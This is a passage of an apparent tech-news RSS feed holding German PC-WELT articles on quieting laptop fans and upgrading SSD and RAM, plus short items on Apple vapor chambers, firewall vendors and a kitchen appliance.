					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Mit Software wie <a href="https://getfancontrol.com/" target="_blank" rel="noreferrer noopener">Fan Control</a> können Sie genau steuern, ab welcher Temperatur Lüfter wie stark arbeiten sollen.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Oft ist nicht die Hardware das Problem, sondern die Art, wie das System mit Leistung und Temperatur umgeht. Windows und macOS arbeiten mit dynamischen Temperatur- und Leistungsprofilen, die entscheiden, wann Prozessor und Lüfter hochdrehen. Diese Profile sind ab Werk aber häufig eher auf Sicherheit als auf Lautstärke ausgelegt und reagieren dadurch manchmal zu aggressiv – sprich: laut.</p>



<ul class="wp-block-list">
<li><strong>Energieeinstellungen anpassen:</strong> Schon die Wahl des Leistungsprofils kann viel verändern. Für typische Alltagsaufgaben wie Surfen, Textverarbeitung oder Streaming reicht oft ein gedrosselter Modus aus. Dadurch sinkt die CPU-Spitzenlast, und der Lüfter muss weniger leisten.</li>



<li><strong>Hintergrundprozesse prüfen:</strong> Dauerhaftes Lüfterrauschen entsteht häufig durch unsichtbare Last im Hintergrund – etwa durch Browser-Tabs, Cloud-Synchronisation oder Updates. Der Task-Manager (Windows) bzw. die Aktivitätsanzeige (macOS) zeigt Ihnen schnell, welche Prozesse permanent CPU-Leistung ziehen.</li>



<li><strong>Lüfter- und Leistungssteuerung:</strong> Tools wie <a href="https://getfancontrol.com/" target="_blank" rel="noreferrer noopener">Fan Control</a>, <a href="https://www.pcwelt.de/article/1082662/hwinfo32.html" target="_blank" rel="noreferrer noopener">HWiNFO</a> oder herstellereigene Systeme wie <a href="https://aurasync.net/armoury-crate-download/" target="_blank" rel="noreferrer noopener">Armoury Crate</a> ermöglichen detaillierte Temperatur- und Lüfterprofile. Damit lassen sich leisere Kurven definieren – etwa mit späterem Hochdrehen der Lüfter oder stabileren Temperaturzonen.</li>
</ul>



<p><strong>Beachten Sie allerdings</strong>: Zu aggressive manuelle Einstellungen können die Temperaturen unnötig in die Höhe treiben oder zu stärkeren Schwankungen führen, wenn das System ständig zwischen Boost und Drosselung pendelt.</p>



<h2 class="wp-block-heading toc">Äußere Einflüsse: Standort, Staubbelastung und Lichteinfall</h2>



<p>Manchmal liegt das Problem nicht im <a href="https://www.pcwelt.de/article/2771173/test-die-besten-laptops-unter-500-euro-2.html" target="_blank" rel="noreferrer noopener">Notebook</a> selbst, sondern in seiner Umgebung. Besonders kritisch sind Unterlagen, die die Luftzufuhr blockieren. Ein Laptop auf dem Bett, Sofa oder Kissen wirkt auf die Kühlung wie eine Dämmmatte: Die Ansaugöffnungen werden teilweise oder komplett verdeckt, während sich die Wärme unter dem Gerät staut.</p>



<p><strong>Darauf sollten Sie achten:</strong></p>



<ul class="wp-block-list">
<li><strong>Der richtige Untergrund:</strong> Immer eine harte, ebene Fläche verwenden. Schon kleine Verbesserungen der Luftzufuhr können die Lüfteraktivität deutlich reduzieren.</li>



<li><strong>Umgebungstemperatur und Lichteinfall:</strong> Direkte Sonneneinstrahlung wird oft unterschätzt. Ein dunkles Notebook auf einem aufgeheizten Schreibtisch kann sich allein durch Umgebungshitze deutlich stärker erwärmen.</li>



<li><strong>Gehäusematerialien:</strong> Hochwertige Geräte aus Aluminium oder Magnesium nutzen das Gehäuse als zusätzlichen Wärmeleiter und verteilen die Hitze besser. Kunststoffgehäuse isolieren stärker, wodurch sich Wärme eher im Inneren staut und Lüfter häufiger aktiv werden müssen.</li>
</ul>



<h2 class="wp-block-heading toc">Hardware-Hilfen: Was bringen Kühlpads im Alltag?</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5a18adb1787"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/KLIM-Wind-Laptop-Kuhler2.jpg?quality=50&amp;strip=all&amp;w=1200" alt="KLIM Wind Laptop Kühler2" class="wp-image-3170798" width="1200" height="745" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><a href="https://www.amazon.de/dp/B09XVLPGZJ?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Kühlpads</a> wie dieses von Klim heben das Notebook ergonomisch an und versorgen damit die Unterseite aktiv mit Frischluft.</figcaption></figure><p class="imageCredit">Klim</p></div>



<p>Wenn Software-Optimierungen und Reinigung nicht mehr ausreichen, kommen externe Kühllösungen ins Spiel – meist in Form von <a href="https://www.amazon.de/dp/B09XVLPGZJ?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Kühlpads</a> oder sogenannten Cooling Stands. Dabei wird das Notebook auf eine erhöhte Plattform gesetzt, unter der kleine Ventilatoren Luft an die Unterseite des Gehäuses blasen.</p>



<p>Besonders bei Gaming-Laptops oder älteren Geräten unter Dauerlast können die Temperaturen damit messbar sinken. Das ist aber nicht immer die Lösung aller Lüfter-Sorgen und stark vom Aufbau des Gerätes abhängig.</p>



<p>Der vielleicht wichtigere Effekt ist eher indirekter Natur: Viele Kühlpads heben das Notebook leicht an. Dadurch verbessert sich der Luftstrom unter dem Gerät, selbst dann, wenn die Lüfter des Pads nur schwach laufen oder gar nicht aktiv sind. Schon ein größerer Abstand zur Tischplatte kann die passive Kühlung stabilisieren und Wärmestau verhindern.</p>



<h2 class="wp-block-heading toc">Technik-Sprung: Neue Notebooks sind im Vorteil</h2>



<p>Wer 2026 ein <a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank" rel="noreferrer noopener">aktuelles Notebook</a> mit Modellen von vor fünf Jahren vergleicht, kann oft einen deutlich ruhigeren Betrieb feststellen. Dafür sind mehrere technologische Entwicklungen verantwortlich, die sich gegenseitig verstärken.</p>



<p>• <strong>ARM-basierte Prozessoren:</strong> Durch Architekturen wie Apple Silicon und moderne Snapdragon-X-Plattformen haben sich besonders im <a href="https://www.pcwelt.de/article/3091319/geekom-geekbook-x14-pro-im-test.html" target="_blank" rel="noreferrer noopener">Ultrabook</a>-Segment sehr energieeffiziente Chips etabliert (etwa von Qualcomm im Windows-Ökosystem). Diese Chips erzeugen bei Alltagslast deutlich weniger Abwärme, wodurch viele Geräte im Büro- und Medienbetrieb sehr leise oder sogar lüfterlos arbeiten können. Bei hoher Dauerlast ist aber auch hier oft noch eine aktive Kühlung notwendig.</p>



<p>• <strong>Intelligentere Leistungs- und Kühlsteuerung:</strong> Statt klassisch harter Lüfterkurven setzen moderne Systeme zunehmend auf vorausschauende Steuerung. Das bedeutet: Leistung wird schrittweise aufgebaut, Temperaturspitzen werden abgefangen, bevor der Lüfter stark hochdrehen muss. Eine echte KI-Kühlung im strengen Sinn ist das zwar nicht, adaptive Algorithmen sorgen aber für deutlich gleichmäßigere Geräuschverläufe.</p>



<p>• <strong>Weiterentwickelte Kühlsysteme:</strong> Neben klassischen Heatpipes kommen in leistungsstärkeren Geräten häufiger <a href="https://www.pcwelt.de/article/1363745/kuhlung-fur-cpu-und-gpu-durch-vapor-chamber-das-steckt-dahinter.html" target="_blank" rel="noreferrer noopener">Vapor-Chamber-Systeme</a> zum Einsatz, die Wärme großflächiger verteilen. In High-End-Modellen werden zudem neue Materialien und Verbundlösungen getestet, um Wärme schneller vom Chip ins Gehäuse abzuleiten. Das Ziel ist weniger maximale Kühlung, sondern ein stabileres Temperaturverhalten mit weniger Lüfterspitzen.</p>



<h2 class="wp-block-heading toc">Profi-Ausrüstung: So machen Sie Ihr System flüsterleise</h2>



<p>Mit dem richtigen Zubehör lässt sich die Lautstärke eines Notebooks oft weiter senken – entweder durch zusätzliche Kühlung im Alltag oder durch gezielte Hardware-Upgrades.</p>



<p>Eine Hardware-Lösung sind etwa externe Vakuum-Kühler wie der <a href="https://www.amazon.de/dp/B08P8JCBB7?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Klim Tempest Laptop Kühler</a>. Solche Geräte werden direkt an die Lüftungsauslässe des Notebooks angesetzt und ziehen die warme Luft aktiv aus dem Gehäuse. Besonders bei älteren oder stark belasteten Geräten kann das die Temperaturen unter Last spürbar senken. Allerdings hängt die Wirkung davon ab, wie gut die Luftführung des jeweiligen Notebooks konstruiert ist.</p>



<p>Für den klassischen Schreibtischbetrieb sind Kühlpads eine deutlich einfachere, weil universelle Lösung. Modelle wie das <a href="https://www.amazon.de/dp/B07V4GTT81?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Targus Cooling Pad</a> kombinieren eine leicht erhöhte Ablagefläche mit integrierten Ventilatoren, die Luft unter das Notebook fächern. Dadurch verbessert sich der Luftstrom an der Gehäuseunterseite, was vor allem bei Geräten mit schwächerer Kühlkonstruktion einen stabileren Temperaturverlauf unterstützt. Gleichzeitig sorgt der Neigungswinkel für eine angenehmere Arbeitshaltung.</p>



<p>Wer den konsequentesten Schritt Richtung Ruhe gehen möchte, kommt aber oft nicht um ein moderneres Gerät herum. Besonders energieeffiziente Notebooks wie das <a href="http://www.amazon.de/dp/B0GR17DBWL?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Apple MacBook Air</a> zeigen, wie weit sich die Geräuschentwicklung inzwischen reduzieren lässt. Durch sehr geringe Abwärme im Alltagsbetrieb bleibt das Kühlsystem oft inaktiv oder arbeitet nur minimal – im Büro- und Medienalltag ist das Gerät praktisch unhörbar.</p>



<h2 class="wp-block-heading">Fazit</h2>



<p>Ein lautes Notebook ist selten ein isoliertes Problem. Meistens ist es ein Zusammenspiel aus mehreren Faktoren: Staub im Inneren, ungünstige Aufstellung, alternde Wärmeleitpaste und eine Kühlstrategie, die nicht mehr optimal arbeitet.</p>



<p>Die gute Nachricht: In vielen Fällen lässt sich die Lautstärke mit überschaubarem Aufwand deutlich reduzieren. Eine <a href="https://www.pcwelt.de/article/2581644/pc-laptop-richtig-reinigen.html" target="_blank" rel="noreferrer noopener">gründliche Reinigung</a>, bessere Luftzufuhr und ein bewusster Umgang mit Energieprofilen reichen oft schon aus, um das Lüfterverhalten spürbar zu beruhigen.</p>



<p>Wenn das nicht mehr reicht, zeigt der Blick auf <a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank" rel="noreferrer noopener">moderne Geräte</a>, wie stark sich die Technik verändert hat. Effiziente Prozessoren und optimierte Kühlsysteme sorgen heute dafür, dass Leistung nicht mehr automatisch mit Lautstärke bezahlt werden muss.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Increases Vapor Chamber Orders Ahead of Foldable iPhone Launch]]></title>
<description><![CDATA[Apple has reportedly increased its vapor chamber orders as it prepares stronger cooling systems for future iPhones, including its first foldable model and the iPhone 18 Pro lineup. The larger order volume suggests Apple plans to use the technology across more premium devices rather than limiting ...]]></description>
<link>https://tsecurity.de/de/3675059/ios-mac-os/apple-increases-vapor-chamber-orders-ahead-of-foldable-iphone-launch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675059/ios-mac-os/apple-increases-vapor-chamber-orders-ahead-of-foldable-iphone-launch/</guid>
<pubDate>Fri, 17 Jul 2026 06:41:23 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has reportedly increased its vapor chamber orders as it prepares stronger cooling systems for future iPhones, including its first foldable model and the iPhone 18 Pro lineup. The larger order volume suggests Apple plans to use the technology across more premium devices rather than limiting it to a single model.



Leaker Fixed Focus Digital wrote on Weibo that Apple has significantly raised its total vapor chamber orders. The source believes Apple is preparing for higher cooling demands in the rumored foldable iPhone and the 20th-anniversary iPhone expected in 2027.



Apple prepares vapor chambers for more iPhones




https://www.youtube.com/watch?v=qAZ-q3KmDHM




Apple introduced vapor chamber cooling with the iPhone 17 Pro, helping the device spread heat more evenly during gaming, video recording, and other demanding tasks. The system uses a small amount of liquid that turns into vapor near hot components, moves toward cooler areas, and condenses before repeating the cycle.



The timing also matches reports about Apple’s 2026 production plans. Apple has reportedly asked suppliers to prepare around 10 million foldable iPhones, up from an earlier target of 7 million to 8 million units.



The company is also expected to produce roughly 70 million iPhone 18 Pro and iPhone 18 Pro Max units. These three models will likely need better thermal control because larger displays, powerful chips, and thinner designs can generate more heat.



Reports also suggest Apple has resolved earlier hinge and manufacturing-yield problems with the foldable iPhone. That progress gives suppliers more confidence as Apple works toward a possible September launch.]]></content:encoded>
</item>
<item>
<title><![CDATA[Top 10 Firewall Solutions Setting New Cybersecurity Standards in 2026 ]]></title>
<description><![CDATA[The firewall category is reinventing itself faster than at any point since NGFW arrived and 2026’s leaders aren’t just shipping better boxes, they’re redefining what “firewall” means. Palo Alto Networks is setting the bar for AI-driven inline prevention, Fortinet for hybrid mesh execution, and HP...]]></description>
<link>https://tsecurity.de/de/3674134/it-security-nachrichten/top-10-firewall-solutions-setting-new-cybersecurity-standards-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674134/it-security-nachrichten/top-10-firewall-solutions-setting-new-cybersecurity-standards-in-2026/</guid>
<pubDate>Thu, 16 Jul 2026 18:41:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The firewall category is reinventing itself faster than at any point since NGFW arrived and 2026’s leaders aren’t just shipping better boxes, they’re redefining what “firewall” means. Palo Alto Networks is setting the bar for AI-driven inline prevention, Fortinet for hybrid mesh execution, and HPE Juniper for the quantum-safe era, while Zscaler and Cloudflare are proving the most consequential firewall of all might be no appliance whatsoever. Here […]</p>
<p>The post <a href="https://gbhackers.com/best-firewall-solutions/">Top 10 Firewall Solutions Setting New Cybersecurity Standards in 2026 </a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[It’s a microwave, it’s an air fryer, it’s a... soup-maker? Ninja’s latest launch could be the only appliance your kitchen needs]]></title>
<description><![CDATA[Microwaved food can easily get soggy, but that's not a problem with this new air fryer and microwave combo, packed with useful presets.]]></description>
<link>https://tsecurity.de/de/3673927/it-nachrichten/its-a-microwave-its-an-air-fryer-its-a-soup-maker-ninjas-latest-launch-could-be-the-only-appliance-your-kitchen-needs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673927/it-nachrichten/its-a-microwave-its-an-air-fryer-its-a-soup-maker-ninjas-latest-launch-could-be-the-only-appliance-your-kitchen-needs/</guid>
<pubDate>Thu, 16 Jul 2026 17:18:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microwaved food can easily get soggy, but that's not a problem with this new air fryer and microwave combo, packed with useful presets.]]></content:encoded>
</item>
<item>
<title><![CDATA[Laptop aufrüsten: So bringen SSD und RAM den größten Leistungsschub]]></title>
<description><![CDATA[Viele Geräte aus den Jahren 2018 bis 2021 arbeiten technisch noch zuverlässig, reagieren im Betrieb aber zäh. In den meisten Fällen laufen neuere Notebooks ab 2022 bis 2025 noch flüssig, aber auch hier kann es sich lohnen, aufzurüsten, um auch in Zukunft stabil und effektiv mit den Geräten arbeit...]]></description>
<link>https://tsecurity.de/de/3672794/it-nachrichten/laptop-aufruesten-so-bringen-ssd-und-ram-den-groessten-leistungsschub/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672794/it-nachrichten/laptop-aufruesten-so-bringen-ssd-und-ram-den-groessten-leistungsschub/</guid>
<pubDate>Thu, 16 Jul 2026 10:33:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Viele Geräte aus den Jahren 2018 bis 2021 arbeiten technisch noch zuverlässig, reagieren im Betrieb aber zäh. In den meisten Fällen <a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank" rel="noreferrer noopener">laufen neuere Notebooks ab 2022 bis 2025 noch flüssig</a>, aber auch hier kann es sich lohnen, aufzurüsten, um auch in Zukunft stabil und effektiv mit den Geräten arbeiten zu können. <a href="https://www.pcwelt.de/article/3177497/windows-10-bekommt-ein-weiteres-jahr-lang-updates.html" target="_blank" rel="noreferrer noopener">Hinzu kommt das Support-Ende von Windows 10, </a>das einen Umstieg auf Windows 11 oder eine Alternative nötig macht. Statt eines Neukaufs genügen oft zwei Eingriffe, der Tausch des Datenträgers und die Erweiterung des Arbeitsspeichers. Beides hebt das Tempo merklich an und verlängert die Nutzungsdauer um mehrere Jahre.</p>



<p><strong>Übrigens:</strong> Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=4-0-3124420-1-0-0-0-0?x-source=rss" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich”.</p>



<div class="ppl_wrap"><div class="top_head"><p class="pro_tag">PROMOTION</p><p><strong>Ihre Kreativ-Projekte brauchen mehr Power? Dieser Laptop liefert sie – inklusive 12 Monaten Adobe Photography Plan</strong></p></div><div class="ppl_row"><div class="pro_right promotion-item__image-outer-wrapper--small"><img decoding="async" class="promotion-item__image" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/HP-PPL-4.png" loading="lazy"></div><p class="ppl_text">
</p><p>Das HP OmniBook Ultra 14 vereint High-End-Leistung mit kompaktem Design: Der Intel® Core™ Ultra 9 Prozessor mit KI-Boost-NPU liefert bis zu 50 TOPS für anspruchsvolle Kreativ-Workflows. Das 14 Zoll 3K-OLED-Touchdisplay mit 120 Hz überzeugt mit brillanten Farben und gestochen scharfen Details. 32 GB RAM und 1 TB SSD sorgen für flüssiges Arbeiten selbst bei großen Dateien. Aktuell erhalten Sie zusätzlich 12 Monate Adobe Photography Plan gratis dazu.</p>
</div><div class="clear-both"></div><div class="more_btn"><a href="https://clk.tradedoubler.com/click?p=245747&amp;a=1573066&amp;epi=rss&amp;url=https://www.hp.com/de-de/shop/products/laptops/hp-omnibook-ultra-laptop-next-gen-ai-14-kd0790ngx-d73wlea-abd?af_de_mn_mk_mc_cm020556_co_x" target="_blank" class="promotion-view-deal-link" rel="noopener">Erfahren Sie mehr über das HP OmniBook Ultra 14</a></div></div>



<h2 class="wp-block-heading toc">Die SSD bringt den größten Tempogewinn</h2>



<p>Den stärksten Effekt <a href="https://www.pcwelt.de/article/3045261/beste-ssd-test.html" target="_blank" rel="noreferrer noopener">liefert der Wechsel auf eine schnelle SSD</a>. Eine alte Festplatte gegen ein Solid State Drive zu tauschen, senkt die Startzeit von Windows von rund 90 auf unter 15 Sekunden. Der Sprung macht aus einem zähen Wartesystem ein reaktionsschnelles Arbeitsmittel. Auch der Schritt von einer langsamen SATA-SSD auf <a href="https://www.pcwelt.de/article/3155710/auf-dieses-detail-mussen-sie-beim-ssd-kauf-unbedingt-achten.html" target="_blank" rel="noreferrer noopener">eine moderne NVMe-SSD (Nonvolatile Memory Express) lohnt sich</a>, denn NVMe-Laufwerke binden über <a href="https://www.pcwelt.de/article/2559721/5-clevere-pcie-upgrades-mit-denen-ihr-pc-richtig-aufdreht.html" target="_blank" rel="noreferrer noopener">vier PCIe-Lanes (PCI Express)</a> an und erreichen ein Vielfaches der SATA-Geschwindigkeit. SATA III liegt bei maximal 600 Megabyte pro Sekunde, eine <a href="https://www.pcwelt.de/article/2864644/die-besten-pcie-4-0-ssds-im-test.html" target="_blank" rel="noreferrer noopener">NVMe-SSD der vierten PCIe-Generation</a> schafft rund 7.000 Megabyte pro Sekunde.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a589724c316f"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/NVME-SSD_RGBeci.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Kingston NVMe-SSD" class="wp-image-3095323" width="1200" height="450" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Wer häufig Speicherengpässe hat, kann sie dauerhaft nur über einen Flashspeicher mit höherer Kapazität lösen – wie etwa hier mit einer NVMe-SSD von Kingston.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Vor dem Kauf steht die Prüfung des Anschlusses. Geräte bis circa 2017 nutzen überwiegend ein 2,5-Zoll-Laufwerk mit SATA-Anschluss, neuere Notebooks setzen auf <a href="https://www.pcwelt.de/article/1675162/hdd-ssd-m2-nvme-etc-darauf-kommt-es-bei-datentragern-an.html" target="_blank" rel="noreferrer noopener">den M.2-Steckplatz</a>. Sitzt im Gerät noch eine Festplatte, findet sich daneben oft ein freier M.2-Slot. Dann übernimmt die neue SSD das System und die Festplatte bleibt als Datenspeicher erhalten. Beim M.2-Format zählt die Baulänge. Gängig sind 2280 mit 80 Millimetern und das kürzere 2230 mit 30 Millimetern Länge, das in kompakten Geräten und Handhelds steckt. Den passenden Wert nennt das Datenblatt des Herstellers.</p>



<p>Bei der Leistungsklasse genügt Privatanwendern die vierte PCIe-Generation. Eine SSD der fünften Generation bringt im normalen Betrieb kaum messbaren Gewinn, erzeugt aber mehr Wärme. Wichtiger als die letzte Stufe der Sequenzrate ist die Ausstattung. Modelle mit eigenem DRAM-Cache und TLC-Speicher halten die Geschwindigkeit unter Last länger als günstige Laufwerke mit QLC-Speicher und niedrigem TBW-Wert (geschriebene Terabyte). Gute Allrounder liefern <a href="https://www.amazon.de/Samsung-Festplatte-Geschwindigkeit-W%C3%A4rmekontrolle-Speichererweiterung/dp/B0BHJDY57J?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Samsung 990 Pro</a>, <a href="https://www.amazon.de/WD_BLACK-SN850X-2280-Speicher-Gaming/dp/B0B7CMZ3QH?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">WD Black SN850X</a> oder die kompakte <a href="https://www.amazon.de/WD_BLACK-Handheld-Gaming-Ger%C3%A4te-kompatible-Geschwindigkeiten-Microsoft/dp/B0CN17F7XC?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">WD Black SN770M im 2230-Format</a>, im Budget-Bereich bleiben Kingston NV3 oder WD Blue SN580 bezahlbar. Für Reserven empfiehlt sich 1 oder 2 Terabyte, denn 1 Terabyte gilt als sinnvolle Untergrenze.</p>



<p><strong>Vor dem Kauf prüfen Sie:</strong></p>



<ul class="wp-block-list">
<li>Anschluss: SATA-Bauform 2,5 Zoll oder M.2-Steckplatz, ablesbar am Datenblatt oder nach dem Öffnen</li>



<li>Baulänge: 2280 oder 2230, vorab mit der Gerätedokumentation abgleichen</li>



<li>Generation: PCIe 4.0 genügt im Regelbetrieb, PCIe 5.0 lohnt nur bei enormen Datenmengen</li>



<li>Ausstattung: TLC-Speicher mit DRAM-Cache für stabile Schreibraten gegenüber QLC-Budgetware</li>
</ul>



<h2 class="wp-block-heading toc">Mehr Arbeitsspeicher beschleunigt das Multitasking</h2>



<p>Der zweite große Hebel ist der Arbeitsspeicher. Reicht der RAM nicht, lagert Windows Daten auf den Datenträger aus und das System wird träge. Für reines Surfen und Office bilden 8 Gigabyte die Untergrenze, für flüssiges Multitasking unter Windows 11 gelten 16 Gigabyte als sinnvoller Standard. Bildbearbeitung, Videoschnitt oder lokale KI-Anwendungen rechtfertigen 32 Gigabyte.</p>



<p>Notebooks nutzen das kompakte SO-DIMM-Format. Vor dem Kauf zählen mehrere Angaben, die Generation DDR4 oder DDR5, die Bauform SO-DIMM und die maximale Taktrate. Der Task-Manager zeigt diese Werte über die Tastenkombination Strg+Umschalt+Esc im Bereich “Leistung” unter “Arbeitsspeicher”, dazu die Zahl der Slots und deren Belegung.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a589724c4017"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/dram.png" alt="DRAM-Taskmanager" class="wp-image-3166365" width="1018" height="682" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>DDR4 und DDR5 sind inkompatibel, die Kerben am Modul sitzen an anderer Stelle. Die Obergrenze des Mainboards nennt das Datenblatt. Alternativ liefert dieser Befehl in der Eingabeaufforderung den Wert in Kilobyte.</p>



<p><em>wmic memphysical get maxcapacity</em></p>



<p>Zwei gleiche Module im Dual-Channel-Betrieb bringen mehr als ein einzelner großer Riegel. Sitzen bereits zwei kleine Module in den Slots, lohnt der Tausch auf ein abgestimmtes Kit. <a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank" rel="noreferrer noopener">Ein wachsender Teil schlanker Ultrabooks</a> führt den Speicher fest verlötet als LPDDR5 oder LPDDR5X, hier scheidet eine Erweiterung aus. Als Nachfolger des SO-DIMM setzt die Branche auf das steckbare CAMM2 und seinen Notebook-Ableger LPCAMM2, der höhere Taktraten bei flacherer Bauform erlaubt.</p>



<h2 class="wp-block-heading toc">Speicherpreise steigen 2026 deutlich</h2>



<p>Die Preise für Arbeitsspeicher und NAND-Flash sind seit Herbst 2025 stark gestiegen, getrieben von der Nachfrage der KI-Rechenzentren. DDR5 kostet je nach Modul ein Mehrfaches des Vorjahreswerts, auch SSDs zogen kräftig an. Eine 2-Terabyte-NVMe-SSD lag vor einem Jahr bei rund 110 Euro und kostet Mitte 2026 je nach Modell deutlich über 300 Euro. Eine Entspannung erwarten die Analysten frühestens Ende 2026.</p>


